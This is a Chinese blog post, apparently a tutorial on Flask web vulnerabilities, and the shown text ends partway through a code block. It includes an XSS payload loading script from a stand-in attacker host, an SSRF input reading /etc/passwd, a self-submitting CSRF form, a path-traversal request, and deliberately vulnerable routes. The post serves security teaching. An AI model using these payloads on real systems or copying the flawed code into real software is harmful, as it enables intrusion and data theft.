

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="notbad3">
  <meta name="keywords" content="The quieter you become,the more you are able to hear">
  
    <meta name="description" content="XSS​	跨站脚本攻击是指在一个网站的环境中注入任意的HTML(包括附带的 JavaScript)。要防御这种攻击，开发者需要正确地转义文本，使其不能包含恶意的HTML标记。在Flask中，除非显式指明不转义，Jinja2会自动转义所有值。这样可以排除(几乎)所有模板导致的XSS问题，比如对于如下视图函数: Flask框架下有两种方法用于渲染jinja2模板，分别是render_template">
<meta property="og:type" content="article">
<meta property="og:title" content="RenDongjun&#39;s Blog">
<meta property="og:url" content="http://example.com/2024/10/13/README/index.html">
<meta property="og:site_name" content="RenDongjun&#39;s Blog">
<meta property="og:description" content="XSS​	跨站脚本攻击是指在一个网站的环境中注入任意的HTML(包括附带的 JavaScript)。要防御这种攻击，开发者需要正确地转义文本，使其不能包含恶意的HTML标记。在Flask中，除非显式指明不转义，Jinja2会自动转义所有值。这样可以排除(几乎)所有模板导致的XSS问题，比如对于如下视图函数: Flask框架下有两种方法用于渲染jinja2模板，分别是render_template">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/Hackmyflask_1.png">
<meta property="og:image" content="http://example.com/img/hmf_5.jpg">
<meta property="og:image" content="http://example.com/img/hmf_loadfile.png">
<meta property="og:image" content="http://example.com/img/hmf_secure_file.png">
<meta property="og:image" content="http://example.com/img/hmf_dunpinto.png">
<meta property="og:image" content="http://example.com/img/hmf_8.png">
<meta property="og:image" content="http://example.com/img/hmf_or_1.png">
<meta property="og:image" content="http://example.com/img/HPP_1.png">
<meta property="og:image" content="http://example.com/img/HPP_2.png">
<meta property="og:image" content="http://example.com/img/HPP_3.png">
<meta property="og:image" content="http://example.com/img/11c117fb2163eb00c4af2070833395fe.png">
<meta property="article:published_time" content="2024-10-13T06:47:02.928Z">
<meta property="article:modified_time" content="2024-09-29T09:17:35.024Z">
<meta property="article:author" content="notbad3">
<meta property="article:tag" content="The quieter you become,the more you are able to hear">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/Hackmyflask_1.png">
  
  
  
  <title>RenDongjun&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>notbad3</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text=""></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-10-13 14:47" pubdate>
          2024年10月13日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          20k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          170 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header"></h1>
            
            
              <div class="markdown-body">
                
                <h2 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h2><p>​	跨站脚本攻击是指在一个网站的环境中注入任意的HTML(包括附带的 JavaScript)。要防御这种攻击，开发者需要正确地转义文本，使其不能包含恶意的HTML标记。在Flask中，除非显式指明不转义，Jinja2会自动转义所有值。这样可以排除(几乎)所有模板导致的XSS问题，比如对于如下视图函数:</p>
<p>Flask框架下有两种方法用于渲染jinja2模板，分别是<code>render_template</code> 和 <code>render_template_string</code>。前者用于渲染存储在文件系统中的模板，后者用于渲染一个模板字符串。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/xss&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">xss_test</span>():<br>    <span class="hljs-keyword">if</span> request.args.get(<span class="hljs-string">&#x27;name&#x27;</span>):<br>        name = request.args.get(<span class="hljs-string">&#x27;name&#x27;</span>)<br>        <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;XSS.html&#x27;</span>, name=name)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;404_ssti.html&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p><img src="/img/Hackmyflask_1.png" srcset="/img/loading.gif" lazyload alt="Hackmyflask_1"></p>
<p>如何显式指明不转义呢？可以通过<code>|safe</code>或<code>Markup</code>实现：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs html">&#123;% block content %&#125;<span class="hljs-tag">&lt;<span class="hljs-name">h2</span>&gt;</span>Hello, &#123;&#123; name |safe &#125;&#125;<span class="hljs-tag">&lt;/<span class="hljs-name">h2</span>&gt;</span><br>&#123;% endblock %&#125;<br></code></pre></td></tr></table></figure>

<p>或：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">name = Markup(request.args.get(<span class="hljs-string">&#x27;name&#x27;</span>))<br></code></pre></td></tr></table></figure>







<p><code>&lt;script src=https://attacker_Server.com/attack.js&gt;&lt;/script&gt;</code></p>
<h2 id="upload-file"><a href="#upload-file" class="headerlink" title="upload file"></a>upload file</h2><h2 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h2><p>​	SSRF(Server-Side Request Forgery) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定 URL 地址获取网页文本内容，加载指定地址的图片，下载等：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs URL">/ssrf?file=file:///etc/passwd<br></code></pre></td></tr></table></figure>

<p>python中会造成这种问题的常用请求库:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python">pycurl<br>urllib<br>urllib3<br>requests<br></code></pre></td></tr></table></figure>

<h4 id="pycurl"><a href="#pycurl" class="headerlink" title="pycurl"></a>pycurl</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">SSRF</span>():<br>    <span class="hljs-keyword">if</span> request.values.get(<span class="hljs-string">&#x27;file&#x27;</span>):<br>        file = request.values.get(<span class="hljs-string">&#x27;file&#x27;</span>)<br>        curl = pycurl.Curl()<br>        curl.setopt(curl.URL, file)<br>        curl.setopt(curl.FOLLOWLOCATION, <span class="hljs-literal">True</span>)<br>        curl.setopt(curl.MAXREDIRS, <span class="hljs-number">3</span>)<br>        curl.setopt(curl.CONNECTTIMEOUT, <span class="hljs-number">5</span>)<br>        buf = BytesIO()<br>        curl.setopt(curl.WRITEDATA, buf)<br>        curl.perform()<br>        curl.close()<br>        body = buf.getvalue()<br>        <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;ssrf.html&#x27;</span>, file=body.decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>))<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;404_ssrf.html&#x27;</span>)<br></code></pre></td></tr></table></figure>











<h2 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h2><p>账户劫持有两种方法：1.我变成“你”。2.我操纵“你”。那么CSRF就属于我操纵“你”。</p>
<p>那要如何操纵呢？攻击者可以构造如下页面：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">html</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">html</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">head</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">meta</span> <span class="hljs-attr">charset</span>=<span class="hljs-string">&quot;UTF-8&quot;</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">title</span>&gt;</span>CSRF<span class="hljs-tag">&lt;/<span class="hljs-name">title</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">head</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">body</span>&gt;</span><br>Hello World!<br><span class="hljs-tag">&lt;<span class="hljs-name">form</span> <span class="hljs-attr">action</span>=<span class="hljs-string">&quot;http://127.0.0.1:5000/transfer&quot;</span> <span class="hljs-attr">method</span>=<span class="hljs-string">&quot;post&quot;</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">hidden</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;text&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;target_user&quot;</span> <span class="hljs-attr">value</span>=<span class="hljs-string">&quot;notbad3&quot;</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">form</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="language-javascript"></span><br><span class="language-javascript">    <span class="hljs-variable language_">document</span>.<span class="hljs-property">forms</span>[<span class="hljs-number">0</span>].<span class="hljs-title function_">submit</span>();</span><br><span class="language-javascript"></span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">html</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>这里通过自动提交表单，将未经授权的请求(target_user&#x3D;notbad3)发送到目标服务器(<a target="_blank" rel="noopener" href="http://127.0.0.1:5000/transfer)%E3%80%82">http://127.0.0.1:5000/transfer)。</a></p>
<p>CSRF依赖cookie自动发送的机制，SameSite的Strict模式不允许你跨站发送cookie。</p>
<h3 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h3><p>我是懒狗</p>
<h4 id="pickle"><a href="#pickle" class="headerlink" title="pickle"></a><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/89132768">pickle</a></h4><h4 id="PyYaml"><a href="#PyYaml" class="headerlink" title="PyYaml"></a><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/12481?time__1311=GqGxRQqiuDyDlrzG78KPxWTqmueQqbKpD">PyYaml</a></h4><h2 id="任意文件读取"><a href="#任意文件读取" class="headerlink" title="任意文件读取"></a>任意文件读取</h2><p>任意文件读取在web中是一个很常见的漏洞，常规形式比如</p>
<figure class="highlight tcl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs tcl"><span class="hljs-keyword">http</span>://www.baidu.com/<span class="hljs-keyword">file</span>?<span class="hljs-keyword">filename</span>=<span class="hljs-number">1.</span>jpg<br></code></pre></td></tr></table></figure>

<p>没有限制目录和过滤请求的时候就会产生利用目录跨越的形式造成任意文件读取</p>
<p>当然，实现文件读取功能的函数有很多，比如：<code>open</code>，<code>urlopen</code>，<code>send_file</code>：</p>
<p><img src="/img/hmf_5.jpg" srcset="/img/loading.gif" lazyload alt="hmf_5"></p>
<p>(urlopen的参数既然是URL，当然能够通过file:&#x2F;&#x2F;进行本地文件读取)</p>
<h4 id=""><a href="#" class="headerlink" title=""></a></h4><p>在Flask中，对于如下代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/readfile&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">read_file</span>():<br>    admin = session.get(<span class="hljs-string">&quot;admin&quot;</span>)<br>    <span class="hljs-keyword">if</span> admin:<br>        filename = request.args.get(<span class="hljs-string">&#x27;filename&#x27;</span>, <span class="hljs-string">&#x27;hello.jpg&#x27;</span>)<br>        <span class="hljs-keyword">if</span> filename:<br>            filepath = os.path.join(app.config[<span class="hljs-string">&#x27;UPLOAD_FOLDER&#x27;</span>], filename)<br>            <span class="hljs-keyword">if</span> os.path.exists(filepath):<br>                <span class="hljs-keyword">try</span>:<br>                    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(filepath, <span class="hljs-string">&#x27;rb&#x27;</span>) <span class="hljs-keyword">as</span> file:  <span class="hljs-comment"># 二进制读取，适用于任意文件类型</span><br>                        content = file.read()<br>                    <span class="hljs-comment"># 根据文件扩展名确定MIME类型</span><br>                    mimetype = <span class="hljs-string">&#x27;application/octet-stream&#x27;</span><br>                    <span class="hljs-keyword">if</span> filename.endswith(<span class="hljs-string">&#x27;.txt&#x27;</span>):<br>                        mimetype = <span class="hljs-string">&#x27;text/plain&#x27;</span><br>                    <span class="hljs-keyword">elif</span> filename.endswith(<span class="hljs-string">&#x27;.html&#x27;</span>):<br>                        mimetype = <span class="hljs-string">&#x27;text/html&#x27;</span><br>                    <span class="hljs-keyword">elif</span> filename.endswith(<span class="hljs-string">&#x27;.jpg&#x27;</span>) <span class="hljs-keyword">or</span> filename.endswith(<span class="hljs-string">&#x27;.jpeg&#x27;</span>):<br>                        mimetype = <span class="hljs-string">&#x27;image/jpeg&#x27;</span><br>                    <span class="hljs-keyword">elif</span> filename.endswith(<span class="hljs-string">&#x27;.png&#x27;</span>):<br>                        mimetype = <span class="hljs-string">&#x27;image/png&#x27;</span><br><br>                    <span class="hljs-comment"># 返回文件内容和MIME类型</span><br>                    <span class="hljs-keyword">return</span> Response(content, mimetype=mimetype)<br>                <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>                    abort(<span class="hljs-number">500</span>, description=<span class="hljs-string">f&quot;Error reading file: <span class="hljs-subst">&#123;e&#125;</span>&quot;</span>)<br>            <span class="hljs-keyword">else</span>:<br>                abort(<span class="hljs-number">404</span>, description=<span class="hljs-string">&quot;File not found&quot;</span>)<br>        <span class="hljs-keyword">else</span>:<br>            abort(<span class="hljs-number">400</span>, description=<span class="hljs-string">&quot;Bad request: &#x27;filename&#x27; parameter is missing&quot;</span>)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;404.html&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>这里对<code>filename</code>参数没有任何限制，很容易通过目录穿越实现任意文件读取：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-regexp">/readfile?filename=../</span>flag.txt<br></code></pre></td></tr></table></figure>











<p>其实防止任意文件读取我们最先考虑的肯定是怎么处理用户输入的文件名</p>
<p><code>utils</code>下存在一个<code>secure_filename</code>函数：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># 正则表达式，用于移除文件名中的不安全字符</span><br>_filename_ascii_strip_re = re.<span class="hljs-built_in">compile</span>(<span class="hljs-string">r&quot;[^A-Za-z0-9_.-]&quot;</span>)<br><br><span class="hljs-comment"># Windows系统中特殊设备文件名</span><br>_windows_device_files = &#123;<span class="hljs-string">&quot;CON&quot;</span>, <span class="hljs-string">&quot;PRN&quot;</span>, <span class="hljs-string">&quot;AUX&quot;</span>, <span class="hljs-string">&quot;NUL&quot;</span>, <span class="hljs-string">&quot;COM1&quot;</span>, <span class="hljs-string">&quot;COM2&quot;</span>, <span class="hljs-string">&quot;COM3&quot;</span>, <span class="hljs-string">&quot;COM4&quot;</span>, <span class="hljs-string">&quot;COM5&quot;</span>, <span class="hljs-string">&quot;COM6&quot;</span>, <span class="hljs-string">&quot;COM7&quot;</span>, <span class="hljs-string">&quot;COM8&quot;</span>, <span class="hljs-string">&quot;COM9&quot;</span>, <span class="hljs-string">&quot;LPT1&quot;</span>, <span class="hljs-string">&quot;LPT2&quot;</span>, <span class="hljs-string">&quot;LPT3&quot;</span>, <span class="hljs-string">&quot;LPT4&quot;</span>, <span class="hljs-string">&quot;LPT5&quot;</span>, <span class="hljs-string">&quot;LPT6&quot;</span>, <span class="hljs-string">&quot;LPT7&quot;</span>, <span class="hljs-string">&quot;LPT8&quot;</span>, <span class="hljs-string">&quot;LPT9&quot;</span>&#125;<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">secure_filename</span>(<span class="hljs-params">filename: <span class="hljs-built_in">str</span></span>) -&gt; <span class="hljs-built_in">str</span>:<br>    <span class="hljs-string">r&quot;&quot;&quot;传入一个文件名，返回一个安全版本的文件名。</span><br><span class="hljs-string">    这个文件名可以安全地存储在常规文件系统中，并可以传递给 :func:`os.path.join`。</span><br><span class="hljs-string">    返回的文件名是一个仅包含ASCII字符的字符串，以确保最大兼容性。</span><br><span class="hljs-string"></span><br><span class="hljs-string">    在Windows系统上，函数还会确保文件名不会与特殊设备文件名相同。</span><br><span class="hljs-string"></span><br><span class="hljs-string">    &gt;&gt;&gt; secure_filename(&quot;My cool movie.mov&quot;)</span><br><span class="hljs-string">    &#x27;My_cool_movie.mov&#x27;</span><br><span class="hljs-string">    &gt;&gt;&gt; secure_filename(&quot;../../../etc/passwd&quot;)</span><br><span class="hljs-string">    &#x27;etc_passwd&#x27;</span><br><span class="hljs-string">    &gt;&gt;&gt; secure_filename(&#x27;i contain cool \xfcml\xe4uts.txt&#x27;)</span><br><span class="hljs-string">    &#x27;i_contain_cool_umlauts.txt&#x27;</span><br><span class="hljs-string"></span><br><span class="hljs-string">    函数可能返回一个空的文件名。你需要确保文件名的唯一性，并在函数返回空文件名时中止操作或生成一个随机文件名。</span><br><span class="hljs-string"></span><br><span class="hljs-string">    .. versionadded:: 0.5</span><br><span class="hljs-string"></span><br><span class="hljs-string">    :param filename: 要处理的文件名</span><br><span class="hljs-string">    &quot;&quot;&quot;</span><br>    <span class="hljs-comment"># 将Unicode字符串标准化为NFKD形式，即分解字符，并去除重音符号等</span><br>    filename = unicodedata.normalize(<span class="hljs-string">&quot;NFKD&quot;</span>, filename)<br>    <span class="hljs-comment"># 将标准化后的字符串编码为ASCII字节串，并忽略非ASCII字符，再解码为ASCII字符串</span><br>    filename = filename.encode(<span class="hljs-string">&quot;ascii&quot;</span>, <span class="hljs-string">&quot;ignore&quot;</span>).decode(<span class="hljs-string">&quot;ascii&quot;</span>)<br><br>    <span class="hljs-comment"># 替换路径分隔符为空格，防止路径遍历攻击</span><br>    <span class="hljs-keyword">for</span> sep <span class="hljs-keyword">in</span> os.sep, os.path.altsep:<br>        <span class="hljs-keyword">if</span> sep:<br>            filename = filename.replace(sep, <span class="hljs-string">&quot; &quot;</span>)<br><br>    <span class="hljs-comment"># 使用正则表达式移除所有不安全的字符，仅保留字母、数字、下划线、点和横线</span><br>    filename = <span class="hljs-built_in">str</span>(_filename_ascii_strip_re.sub(<span class="hljs-string">&quot;&quot;</span>, <span class="hljs-string">&quot;_&quot;</span>.join(filename.split()))).strip(<span class="hljs-string">&quot;._&quot;</span>)<br><br>    <span class="hljs-comment"># 在Windows系统上，确保文件名不与特殊设备文件名冲突</span><br>    <span class="hljs-keyword">if</span> (<br>        os.name == <span class="hljs-string">&quot;nt&quot;</span><br>        <span class="hljs-keyword">and</span> filename<br>        <span class="hljs-keyword">and</span> filename.split(<span class="hljs-string">&quot;.&quot;</span>)[<span class="hljs-number">0</span>].upper() <span class="hljs-keyword">in</span> _windows_device_files<br>    ):<br>        filename = <span class="hljs-string">f&quot;_<span class="hljs-subst">&#123;filename&#125;</span>&quot;</span><br><br>    <span class="hljs-keyword">return</span> filename<br></code></pre></td></tr></table></figure>





<h4 id="send-file"><a href="#send-file" class="headerlink" title="send_file"></a>send_file</h4><h3 id="伪随机数"><a href="#伪随机数" class="headerlink" title="伪随机数"></a>伪随机数</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/guess&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">guess_number</span>():<br>    random.seed(<span class="hljs-number">10</span>)<br>    random_number = random.randint(<span class="hljs-number">1</span>, <span class="hljs-number">999999999</span>)<br><br>    <span class="hljs-keyword">if</span> request.method == <span class="hljs-string">&#x27;POST&#x27;</span>:<br>        user_guess = request.form.get(<span class="hljs-string">&#x27;guess&#x27;</span>)<br><br>        <span class="hljs-keyword">if</span> user_guess:<br>            <span class="hljs-keyword">try</span>:<br>                user_guess = <span class="hljs-built_in">int</span>(user_guess)<br>            <span class="hljs-keyword">except</span> ValueError:<br>                <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&quot;guess.html&quot;</span>, error=<span class="hljs-string">&quot;Invalid input. Please enter a number.&quot;</span>)<br><br>            path = os.path.join(app.config[<span class="hljs-string">&#x27;UPLOAD_FOLDER&#x27;</span>], <span class="hljs-string">&quot;flag.txt&quot;</span>)<br><br>            <span class="hljs-keyword">if</span> user_guess == random_number:<br>                <span class="hljs-keyword">try</span>:<br>                    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(path, <span class="hljs-string">&#x27;rb&#x27;</span>) <span class="hljs-keyword">as</span> file:<br>                        content = file.read()<br>                    <span class="hljs-keyword">return</span> render_template(<span 